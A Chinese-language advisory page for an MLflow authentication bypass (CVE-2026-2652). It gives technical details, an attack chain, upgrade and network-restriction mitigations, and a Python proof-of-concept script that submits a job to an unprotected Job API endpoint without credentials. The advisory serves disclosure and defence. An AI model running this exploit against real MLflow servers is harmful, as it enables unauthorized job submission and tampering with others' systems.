CVE-2026-2652 CVSS 8.6 高危

CVE-2026-2652 MLflow认证绕过漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2652

漏洞类型

认证绕过

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MLflow

漏洞概述

MLflow 3.9.0及更早版本存在认证绕过漏洞。当启用basic-auth并通过uvicorn服务时，FastAPI中间件未对`/gateway/`以外的路径（如Job API）进行权限验证，导致未授权攻击者可提交恶意作业或读取敏感数据。

技术细节

该漏洞源于MLflow在集成FastAPI时的权限验证架构缺陷。虽然服务器启动时配置了`--app-name basic-auth`，但FastAPI权限中间件仅对`/gateway/`路由强制执行身份验证。由于`_find_fastapi_validator()`函数无法正确处理非`/gateway/`路径，导致`/ajax-api/3.0/jobs/*`和`/v1/traces`等关键接口处于未保护状态。攻击者无需登录即可直接访问这些API，执行提交作业、取消任务、注入追踪数据等操作，完全绕过身份认证机制。

攻击链分析

STEP 1

侦察

攻击者发现目标网络中运行着MLflow服务器，且版本在3.9.0或更早。

STEP 2

漏洞探测

攻击者尝试直接访问受保护的API端点（如/ajax-api/3.0/jobs/），确认未返回401或403认证错误。

STEP 3

利用

攻击者向未受保护的Job API或Traces API发送恶意POST请求，无需提供认证凭据。

STEP 4

执行与影响

服务器接受请求，攻击者成功提交恶意作业、取消正在运行的任务或注入虚假追踪数据，破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://vulnerable-mlflow-server:5000"

# Vulnerable endpoint that bypasses authentication
# Reference: /ajax-api/3.0/jobs/* or /v1/traces
endpoint = "/ajax-api/3.0/jobs/submit"
url = f"{target_host}{endpoint}"

# Payload to create a malicious job
payload = {
    "job_name": "PoC_Exploit_Job",
    "entry_point_name": "main",
    "project_id": "1",
    "spec": {
        "metadata": {
            "name": "malicious-job"
        },
        "mlflow_version": "3.9.0"
    }
}

try:
    # Send request without authentication headers
    response = requests.post(url, json=payload, timeout=10)

    if response.status_code == 200:
        print("[+] Exploit Successful! Authentication bypassed.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

mlflow/mlflow <= 3.9.0

防御指南

临时缓解措施

建议立即升级至3.10.0或更高版本。若暂不可升级，应通过网络边界设备限制对MLflow服务器的访问，仅允许受信任的IP地址连接，或配置反向代理拦截对非预期路由的请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表